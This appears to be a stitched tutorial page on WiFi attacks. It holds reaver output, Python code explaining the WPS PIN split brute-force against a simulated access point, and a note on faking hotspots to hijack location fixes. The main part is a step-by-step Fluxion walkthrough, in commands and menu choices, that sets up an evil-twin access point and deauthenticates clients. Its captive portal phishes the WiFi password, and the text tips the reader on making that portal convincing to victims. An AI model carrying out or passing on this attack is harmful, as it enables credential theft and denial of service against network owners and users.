Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan0mon to channel 6
[+] Waiting for beacon from D0:C7:C0:18:59:C0
[+] Received beacon from D0:C7:C0:18:59:C0
[+] Vendor: Unknown 
[+] Trying pin "12345670"
[+] Sending authentication request
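
The arithmetic behind "Trying pin 12345670", as an added example that is not part of the original page or of reaver: the checksum rule that makes an 8-digit PIN valid, and the split search that reaver runs against an AP that rejects a wrong first half after message M4 and a wrong second half after M6. The registrar here is a constructed stand-in for the AP's side of the exchange, not on-air traffic; its lock_after option models APs that lock WPS after repeated failures, which wash reports in the Lck column.

```python
def wps_checksum(first_seven: int) -> int:
    """Checksum digit that makes an 8-digit WPS PIN valid (the rule reaver uses to build candidates)."""
    accum = 0
    while first_seven:
        accum += 3 * (first_seven % 10)
        first_seven //= 10
        accum += first_seven % 10
        first_seven //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


class WpsRegistrar:
    """Constructed stand-in for the AP side of WPS registration: a wrong first half is rejected
    after M4, a wrong second half after M6, so each half leaks separately. lock_after models an
    AP that locks WPS after that many failures (wash: Lck=Yes)."""

    def __init__(self, pin: str, lock_after=None):
        self.pin = pin
        self.lock_after = lock_after
        self.failures = 0
        self.locked = False

    def try_pin(self, pin: str) -> str:
        if self.locked:
            raise RuntimeError("AP has locked WPS; reaver would have to wait for it to unlock")
        if pin[:4] != self.pin[:4]:
            self._fail()
            return "NACK-M4"
        if pin[4:] != self.pin[4:]:
            self._fail()
            return "NACK-M6"
        return "OK"

    def _fail(self):
        self.failures += 1
        if self.lock_after is not None and self.failures >= self.lock_after:
            self.locked = True


def split_pin_attack(ap: WpsRegistrar):
    """Reaver's strategy: up to 10^4 guesses for the first half, then up to 10^3 for the second
    (checksum digit computed, not guessed): at most 11,000 attempts instead of 10^8.
    Returns (pin, attempts)."""
    attempts = 0
    first_half = None
    for i in range(10_000):
        attempts += 1
        if ap.try_pin(f"{i:04d}0000") != "NACK-M4":    # got past M4: first half is right
            first_half = f"{i:04d}"
            break
    if first_half is None:
        return None, attempts
    for j in range(1_000):
        attempts += 1
        seven = first_half + f"{j:03d}"
        pin = seven + str(wps_checksum(int(seven)))
        if ap.try_pin(pin) == "OK":
            return pin, attempts
    return None, attempts


if __name__ == "__main__":
    print(split_pin_attack(WpsRegistrar("12345670")))
```

Against the constructed PIN 12345670 the split search needs 1,803 attempts (1,235 for the first half, 568 for the second); at reaver's usual rate of a few seconds per attempt that is well under a day even in the worst case of 11,000, which is the whole point of the attack. An AP that locks WPS after a handful of failures turns the same search into a waiting game, which is what the Lck column in wash warns about.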

Rogue WiFi security testing and defence

How WiFi hijacking works

  • Based on how WiFi positioning works, the simplest way to hijack a location fix is to fake enough hotspots to convince the positioning server that we are at a particular place. The faked hotspot data has to already be in the provider's database, so the real hotspot information around the chosen location has to be obtained first.

  • Existing hotspot signals interfere with the result, so this succeeds more easily where there are few surrounding hotspots.

  • The hijack Fluxion automates below is a different one: a rogue AP (an "evil twin") carrying the target's ESSID, a deauthentication attack that pushes clients off the real AP, and a captive portal that asks the reconnecting client for the WiFi password, which Fluxion then checks against a previously captured handshake.

Installing Fluxion

  • Fluxion is a security auditing and social-engineering research tool.
# Download (either clone URL works)
git clone git@github.com:FluxionNetwork/fluxion.git
git clone https://www.github.com/FluxionNetwork/fluxion.git
# Change into the tool directory
cd fluxion
# Install the dependencies
./fluxion.sh -i

Security testing with Fluxion

  • Start Fluxion
┌──(root💀kali)-[~/下载/fluxion-master]
└─# ./fluxion.sh   
  • Choose a language
[*] Select your language

        [1] ar / Arabic
        [2] cs / čeština
        [3] de / Deutsch
        [4] el / Ελληνικά
        [5] en / English
        [6] es / Español
        [7] fr / français
        [8] it / italiano
        [9] nl / Nederlands
        [10] pl / Polski
        [11] pt-br / Português-BR
        [12] ro / Română
        [13] ru / Русский
        [14] sk / slovenčina
        [15] sl / Slovenščina
        [16] tur / Türkçe
        [17] zh / 中文

[fluxion@kali]-[~] 17
  • Choose an attack
[*] Select an attack

                           ESSID: "[N/A]" / [N/A]
                         Channel:  [N/A]
                           BSSID:  [N/A] ([N/A])

        [1] Captive Portal       Creates an "evil twin" access point.
        [2] Handshake Snooper    Acquires WPA/WPA2 encryption hashes.
        [3] Back

[fluxion@kali]-[~] 1
  • Choose the channels to scan
[*] Select the channels to scan

        [1] All channels (2.4GHz)
        [2] All channels (5GHz)
        [3] All channels (2.4GHz & 5GHz)
        [4] Specific channels
        [5] Back

[fluxion@kali]-[~] 1
  • Choose the target WiFi
                                         WIFI LIST                                        

[ * ] ESSID                                    QLTY PWR STA CH SECURITY              BSSID

[001] TP-LINK_****                              90% -63   0 11 WPA2 WPA  D0:C7:**:**:59:C0
[002] TP-LINK_****                             100% -60   0  6 WPA2 WPA  48:7D:**:**:BA:60
[003] ****                                     100% -59   0  1 WPA2 WPA  70:3A:**:**:AD:B1
[004] TP-LINK_****                             100% -53   0 10 WPA2      88:25:**:**:B1:70

[fluxion@kali]-[~] 2
  • Choose a wireless interface for target tracking
[*] Select a wireless interface for target tracking.
[*] A dedicated interface may be required.
[*] If you are unsure, choose "Skip"!

[1] wlan0mon [*] Ralink Technology, Corp. RT5370
[2] Skip
[3] Rescan
[4] Back

[fluxion@kali]-[~] 1
  • Choose an interface for the access point
[*] Select an interface for the access point

[1] eth0     [-] Intel Corporation 82545EM Gigabit Ethernet Controller (Copper) (rev 01)
[2] wlan0mon [*] Ralink Technology, Corp. RT5370
[3] Rescan
[4] Back

[fluxion@kali]-[~] 2
  • Choose the rogue access point implementation
[*] Select an access point

                           ESSID: "TP-LINK_BA60" / WPA2 WPA
                         Channel:  6
                           BSSID:  48:7D:2E:59:BA:60 ([N/A])

        [1] Rogue AP - hostapd (recommended)
        [2] Rogue AP - airbase-ng (slow)
        [3] Back

[fluxion@kali]-[~] 1
  • Supply the captured handshake (the wifi-01.cap captured earlier); Fluxion uses it to verify the password a victim types into the portal
[*] Specify the path to the captured handshake (e.g. /.../dump-01.cap)
[*] To go back, leave the hash path blank

Absolute path to the captured handshake: /root/桌面/wifi-01.cap
  • Choose the hash verification method
[*] Select a hash verification method

                           ESSID: "TP-LINK_BA60" / WPA2 WPA
                         Channel:  6
                           BSSID:  48:7D:2E:59:BA:60 ([N/A])

        [1] aircrack-ng verification (not recommended)
        [2] cowpatty verification (recommended)

[fluxion@kali]-[~] 2
  • Choose the SSL certificate source for the captive portal
[*] Select an SSL certificate source for the captive portal

        [1] Create an SSL certificate
        [2] Detect an SSL certificate (search again)
        [3] No certificate (disable SSL)
        [4] Back

[fluxion@kali]-[~] 1
  • Choose 1 so that every device connected to the target WiFi is kicked off it.
[*] Select an Internet connectivity type for the rogue network

        [1] Disconnected (recommended)
        [2] Emulated
        [3] Back

[fluxion@kali]-[~] 1
  • Portal page: here the built-in generic login page (Chinese) is used. It looks somewhat fake; for a convincing result write a page that matches the victim's router vendor (TP-Link, Mercury, Huawei and so on), or pick one of the vendor templates Fluxion ships, such as the Zyxel entries at the end of the list. This step decides whether the victim actually types in the key.
[*] Select a captive portal page for the rogue hotspot

                           ESSID: "TP-LINK_BA60" / WPA2 WPA
                         Channel:  6
                           BSSID:  48:7D:2E:59:BA:60 ([N/A])

               [01] Generic portal                                 Arabic
               [02] Generic portal                              Bulgarian
               [03] Generic portal                                Chinese
               [04] Generic portal                                  Czech
               [05] Generic portal                                 Danish
               [06] Generic portal                                  Dutch
               [07] Generic portal                                English
               [08] Generic portal                                 French
               [09] Generic portal                                 German
               .......
               [77] Zyxel                                                ru
               [78] Zyxel                                               tur
               [79] Back

[fluxion@kali]-[~] 3
  • All six windows open: the rogue AP is up and the real AP is under attack, so clients can no longer log in to it.

  • On a device that was previously connected to this WiFi, the original network can no longer be joined; the device automatically connects to our rogue hotspot and the login page pops up.
    The rogue AP is established.